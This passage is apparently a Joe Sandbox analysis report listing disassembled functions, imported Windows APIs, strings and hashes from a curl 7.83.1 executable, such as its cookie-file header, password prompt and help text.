_unlink.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,000000013F4A6956,?,?,00000000,000000013F48B1A6), ref: 000000013F4A6120
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,000000013F4A6956,?,?,00000000,000000013F48B1A6), ref: 000000013F4A6162

Strings

%s.%s.tmp, xrefs: 000000013F4A5FEB
%s, xrefs: 000000013F4A60C6
# Netscape HTTP Cookie File# https://curl.se/docs/http-cookies.html# This file was generated by libcurl! Edit at your own risk., xrefs: 000000013F4A6026

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: fclose$__acrt_iob_func_scwprintf_time64_unlinkfputsqsort
String ID: # Netscape HTTP Cookie File# https://curl.se/docs/http-cookies.html# This file was generated by libcurl! Edit at your own risk.$%s$%s.%s.tmp
API String ID: 1743472579-1951421411
Opcode ID: 3d8685de0f6e550342ad27a64f5a87a40584b735791b02571328bc08ee04d199
Instruction ID: 0d6865f379b68fe2ab704be50c6d7526eb224a165ea5ad6f9623681ffa0d3695
Opcode Fuzzy Hash: 3d8685de0f6e550342ad27a64f5a87a40584b735791b02571328bc08ee04d199
Instruction Fuzzy Hash: A5518B35B05B4486FE55EB22A9547EB27B0BB49BC8F444039ED0E473A6EE3CC64B8340

Function 000000013F4901E0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 129COMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F4902BB
__swprintf_l.LIBCMT ref: 000000013F4902E4
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F4902EE
fputs.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F4902FC
_getch.API-MS-WIN-CRT-CONIO-L1-1-0 ref: 000000013F49030B
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F490342
fputs.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F490352
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F49039A

Strings

%s:%s, xrefs: 000000013F49037B
Enter %s password for user '%s':, xrefs: 000000013F4902AA
Enter %s password for user '%s' on URL #%zu:, xrefs: 000000013F4902CE

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: __acrt_iob_func__swprintf_lfputs$_getchfree
String ID: %s:%s$Enter %s password for user '%s' on URL #%zu:$Enter %s password for user '%s':
API String ID: 768465752-2337704101
Opcode ID: ee29db12ca0665365c94177c0bcdd086137660af24da16c43ee963f43f3fef36
Instruction ID: 312ff60d6f9e6d215d1a4a895aefa2daf25bff4d36bd9697522d563ba8dcf6ea
Opcode Fuzzy Hash: ee29db12ca0665365c94177c0bcdd086137660af24da16c43ee963f43f3fef36
Instruction Fuzzy Hash: F9517F32B05A8086EB619B65E8503DB77A5BB84784F84413EEE89477AADF38C656C700

Function 000000013F49E9C8 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 78stringCOMMON

Download Yara Rule

APIs

GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49E9E3
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49E9EB
__sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49E9FB
__sys_errlist.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49EA05
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F49EA18
__swprintf_l.LIBCMT ref: 000000013F49EA5A
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49EAA8
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49EAB3
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49EABC
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49EAC8

Strings

Unknown error %d (%#x), xrefs: 000000013F49EA4B

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorLast_errno$__swprintf_l__sys_errlist__sys_nerrstrncpy
String ID: Unknown error %d (%#x)
API String ID: 1793456055-2414550090
Opcode ID: 722845d8a610ba7c2703c60a57ff632a872729768dbbd030aded981cdb362460
Instruction ID: 56f4d97ecb4dbfda0c96ccccf548da6867a9abb444946c89338d8097aed9a418
Opcode Fuzzy Hash: 722845d8a610ba7c2703c60a57ff632a872729768dbbd030aded981cdb362460
Instruction Fuzzy Hash: 3D315C35B0474185FA15AF21A4147AF7792BB85B85F88443CEE4A47BE7DF3D8A428720

Function 000000013F483AC8 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 75filetimeCOMMON

Download Yara Rule

APIs

_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F483AE3
CreateFileA.API-MS-WIN-CORE-FILE-L1-1-0 ref: 000000013F483B0D
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F483B1E
GetFileTime.API-MS-WIN-CORE-FILE-L1-1-0 ref: 000000013F483B3A
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 000000013F483BBC
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F483BC4
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F483BCF

Strings

Failed to get filetime: CreateFile failed: GetLastError %u, xrefs: 000000013F483BD5
Failed to get filetime: underflow, xrefs: 000000013F483B62
Failed to get filetime: GetFileTime failed: GetLastError %u, xrefs: 000000013F483BA7

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorFileLast$CloseCreateHandleTime_strdupfree
String ID: Failed to get filetime: CreateFile failed: GetLastError %u$Failed to get filetime: GetFileTime failed: GetLastError %u$Failed to get filetime: underflow
API String ID: 1016757606-2112902429
Opcode ID: 262024fe6c3cde13a0cb35c274e0595f52d58bce0af3a7a284f9fbce9e73a93d
Instruction ID: 5d867b28c60300c82d95cd09ca1ce03cc2f8c8b478ab956f859926b977aaa9a1
Opcode Fuzzy Hash: 262024fe6c3cde13a0cb35c274e0595f52d58bce0af3a7a284f9fbce9e73a93d
Instruction Fuzzy Hash: 2731C271B0464482FB149B26A4143EBB7A1FB84BD0F484639E95E07BD6EF2DC647C700

Function 000000013F48990C Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 197COMMON

Download Yara Rule

APIs

_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F48995D
_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F4899AF
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F4899E3
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F489A19
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F489AC1
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F489BD9

Strings

option %s: %s, xrefs: 000000013F489BAA
%s, xrefs: 000000013F489BC2
2, xrefs: 000000013F489A46
--url, xrefs: 000000013F489B46

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: free$_strdup$malloc
String ID: %s$--url$2$option %s: %s
API String ID: 854390910-1570926479
Opcode ID: 1de127588c734ebbed0c8444cb0a0d952fa855a3f5e616187e5108e14bc2b059
Instruction ID: 3425d9d3bd8d64804c0b83341564bd078c029bfe5901fd1ae0fec6dba3d23e69
Opcode Fuzzy Hash: 1de127588c734ebbed0c8444cb0a0d952fa855a3f5e616187e5108e14bc2b059
Instruction Fuzzy Hash: C5819132A09BC48AEB669B25A4503EB7B91F785B94F1C413DDA8D47785EB3AC647C300

Function 000000013F493968 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 96libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 000000013F49399D
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 000000013F4939AD
VerSetConditionMask.API-MS-WIN-CORE-SYSINFO-L1-2-0 ref: 000000013F493A3C
VerSetConditionMask.API-MS-WIN-CORE-SYSINFO-L1-2-0 ref: 000000013F493A4D
VerSetConditionMask.API-MS-WIN-CORE-SYSINFO-L1-2-0 ref: 000000013F493A5E
VerSetConditionMask.API-MS-WIN-CORE-SYSINFO-L1-2-0 ref: 000000013F493A6F
VerSetConditionMask.API-MS-WIN-CORE-SYSINFO-L1-2-0 ref: 000000013F493A80
VerifyVersionInfoW.API-MS-WIN-CORE-KERNEL32-LEGACY-L1-1-1 ref: 000000013F493AAF

Strings

RtlVerifyVersionInfo, xrefs: 000000013F4939A6
ntdll, xrefs: 000000013F493996

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ConditionMask$AddressHandleInfoModuleProcVerifyVersion
String ID: RtlVerifyVersionInfo$ntdll
API String ID: 60985879-1699696460
Opcode ID: a2b51daf946700963a2e2554f2a48f04fa606162fb9106bcf4c5e23bc4cf3138
Instruction ID: 95b85c206920ecaf2f6491d6d74d51e026c4964380582e2644a7544550cedbb4
Opcode Fuzzy Hash: a2b51daf946700963a2e2554f2a48f04fa606162fb9106bcf4c5e23bc4cf3138
Instruction Fuzzy Hash: 9B418131B456408AF7649B25E8193FB3794E78BB94F04013DEA4E07795EE3DC64A8740

Function 000000013F483EDC Relevance: 16.6, APIs: 11, Instructions: 137COMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F483F28
_fileno.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F483F31
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F483F41
_fileno.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F483F4A
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F483F5F
ftell.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F483F68
_fstat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0 ref: 000000013F483F80
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F483FB3
_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F483FE6
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F48402C
_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F484058

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: __acrt_iob_func$_fileno_strdup$_fstat64freeftell
String ID:
API String ID: 1299477587-0
Opcode ID: 79eaa1cf3bedb6ec6923da53c50699186514a1163730ca21cbdf86dcc8735609
Instruction ID: c6b052ce03d5435703581f3ef991f7aa8b12c50837e859156dd84dc5c6fad9e4
Opcode Fuzzy Hash: 79eaa1cf3bedb6ec6923da53c50699186514a1163730ca21cbdf86dcc8735609
Instruction Fuzzy Hash: F151DF32B0574081FB259B21A8507AB7AA0A785BD4F51053CEE494B7E2FF3EC643C340

Function 000000013F493DF8 Relevance: 16.2, APIs: 6, Strings: 3, Instructions: 464stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,00000001,000000013F495142,?,?,?,?,000000013F481404), ref: 000000013F493E9F
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000001,000000013F495142,?,?,?,?,000000013F481404), ref: 000000013F493EBD
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000001,000000013F495142,?,?,?,?,000000013F481404), ref: 000000013F494018
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000001,000000013F495142,?,?,?,?,000000013F481404), ref: 000000013F494038
strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,?,00000001,000000013F495142,?,?,?,?,000000013F481404), ref: 000000013F494135
strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,?,00000001,000000013F495142,?,?,?,?,000000013F481404), ref: 000000013F494179

Strings

I64, xrefs: 000000013F493EB3, 000000013F49402B
I32, xrefs: 000000013F493E95, 000000013F49400B
%s== Info: %.*s, xrefs: 000000013F493E0A

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: strncmp$strtol
String ID: %s== Info: %.*s$I32$I64
API String ID: 1111410017-699021961
Opcode ID: 1267a26aac4a315d804af1774754580a0ae1bca02bf288fcad5f4b6862db9ef4
Instruction ID: 3e50e7e1a8cbd4811e53e032b4681663cb2f1e7b4a789c37d02eb446ddf94a42
Opcode Fuzzy Hash: 1267a26aac4a315d804af1774754580a0ae1bca02bf288fcad5f4b6862db9ef4
Instruction Fuzzy Hash: 2302B276F1064085FB788A68E568BFF26A5F756748F16853ECA4643AF8D639CB43C300

Function 000000013F4AC028 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 173COMMON

Download Yara Rule

Strings

%s.%s.tmp, xrefs: 000000013F4AC0BB
%d%02d%02d %02d:%02d:%02d, xrefs: 000000013F4AC1DA
# Your HSTS cache. https://curl.se/docs/hsts.html# This file was generated by libcurl! Edit at your own risk., xrefs: 000000013F4AC0F8

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID:
String ID: # Your HSTS cache. https://curl.se/docs/hsts.html# This file was generated by libcurl! Edit at your own risk.$%d%02d%02d %02d:%02d:%02d$%s.%s.tmp
API String ID: 0-2376955543
Opcode ID: 692f2f8556ace63d6b47308a09e5bf39eab2334fcd95f98ad9481ff024679c8b
Instruction ID: c866443be64eee7de6f21e69e9ef6fa99d68c94de1a74d600903e87388f6de70
Opcode Fuzzy Hash: 692f2f8556ace63d6b47308a09e5bf39eab2334fcd95f98ad9481ff024679c8b
Instruction Fuzzy Hash: DD719E72F006418AFFA5DBA9D5807DA33B1F708794F408539DF1997799EB38CA4A8740

Function 000000013F4920EC Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 141COMMON

Download Yara Rule

APIs

realloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F4921DA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F492216
_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F492230

Strings

range overflow, xrefs: 000000013F49226E
empty string within braces, xrefs: 000000013F492283
unexpected close bracket, xrefs: 000000013F49229D
out of memory, xrefs: 000000013F4922BA
nested brace, xrefs: 000000013F4922A6
unmatched brace, xrefs: 000000013F4922D7

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: _strdupmallocrealloc
String ID: empty string within braces$nested brace$out of memory$range overflow$unexpected close bracket$unmatched brace
API String ID: 178021264-3046722810
Opcode ID: 974c668c299ee9774a45e061ea81ad6e394b7ccd718daec43709466e76dff075
Instruction ID: d70ac461a8080b0d53694af4bbfa4e12bab859241dd9993436d03b76c161b395
Opcode Fuzzy Hash: 974c668c299ee9774a45e061ea81ad6e394b7ccd718daec43709466e76dff075
Instruction Fuzzy Hash: EE51A932B05B948AE795CF15E448BAB77A4F308B84F5A8539CE8947794DF38C752C300

Function 000000013F485888 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 127stringCOMMON

Download Yara Rule

APIs

strpbrk.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F4858EA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F4858FD
strcspn.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F485928
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F48593A
_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F4859DB
_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F4859EB
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F4859F7
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F485A0A

Strings

pkcs11:, xrefs: 000000013F4858CC

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: _strdupfree$mallocstrcspnstrncpystrpbrk
String ID: pkcs11:
API String ID: 2625012686-2446828420
Opcode ID: f9b92b66d6dc22946b411c9218ce8ddd335822bcc15ef46096bf95a8b0999d72
Instruction ID: 3310f79feaed0dd65b63671dbf59be6bc22d37e2e22f6a27b8dd5534a1d77b14
Opcode Fuzzy Hash: f9b92b66d6dc22946b411c9218ce8ddd335822bcc15ef46096bf95a8b0999d72
Instruction Fuzzy Hash: A0419F32A096D485FB618F15A8543EB6F91A715BF0F488139DE99077D5EB2ACA83C300

Function 000000013F490444 Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 81COMMON

Download Yara Rule

APIs

_strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,000000013F48F917), ref: 000000013F490546

Strings

Content-Type: application/json, xrefs: 000000013F490492
out of memory, xrefs: 000000013F49055B
host, xrefs: 000000013F4904FE
Accept, xrefs: 000000013F4904B4
Content-Type, xrefs: 000000013F49047F
Accept: application/json, xrefs: 000000013F4904C7
curl/7.83.1, xrefs: 000000013F49053F
proxy, xrefs: 000000013F490523

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: _strdup
String ID: Accept$Accept: application/json$Content-Type$Content-Type: application/json$curl/7.83.1$host$out of memory$proxy
API String ID: 1169197092-2108368468
Opcode ID: 009e05c5cfe81489adb0076801135eebd16bfa9b97869c28fe556ae7a8bd23ca
Instruction ID: 46d854f170620c4cac4208b02fcf501e621f228946f2f158e3a27ce49fe83152
Opcode Fuzzy Hash: 009e05c5cfe81489adb0076801135eebd16bfa9b97869c28fe556ae7a8bd23ca
Instruction Fuzzy Hash: 9D312832B05B4492FB59DB2A95403EB67A0FB54B80F484039EB18877A2EF75D797C340

Function 000000013F489D3C Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 66COMMON

Download Yara Rule

APIs

puts.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F489D5F
puts.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F489DFD
puts.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F489D7B

Part of subcall function 000000013F4950D8: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000050,000000013F489CBC), ref: 000000013F4950F9

Strings

all, xrefs: 000000013F489D86
This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all"., xrefs: 000000013F489D74
Usage: curl [options...] <url>, xrefs: 000000013F489D58
Invalid category provided, here is a list of all categories:, xrefs: 000000013F489DF6
%s: %s, xrefs: 000000013F489E38
category, xrefs: 000000013F489DA5

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: puts$__acrt_iob_func
String ID: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".$%s: %s$Invalid category provided, here is a list of all categories:$Usage: curl [options...] <url>$all$category
API String ID: 1292152210-1419887204
Opcode ID: f7184cb644edf7fad2517d2ada4b8365c6cc52b94971f4c97aa5ef37d305f758
Instruction ID: abe2e430c56a5317b16a5d2d42f96dac30d54e93385a7a18c77d0114ac7d167a
Opcode Fuzzy Hash: f7184cb644edf7fad2517d2ada4b8365c6cc52b94971f4c97aa5ef37d305f758
Instruction Fuzzy Hash: FE31F731A14A0481FB14AF52E9943EA6BA1FB54FD0F94443EE90A977E6DF29CA07C350

Function 000000013F49EF2D Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F49F021

Part of subcall function 000000013F49E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F49E951
Part of subcall function 000000013F49E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F49E967

__swprintf_l.LIBCMT ref: 000000013F49F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F49F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F09C

Strings

%s (0x%08X), xrefs: 000000013F49F00C
%s - %s, xrefs: 000000013F49F059
SEC_E_WRONG_PRINCIPAL, xrefs: 000000013F49EF2D

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
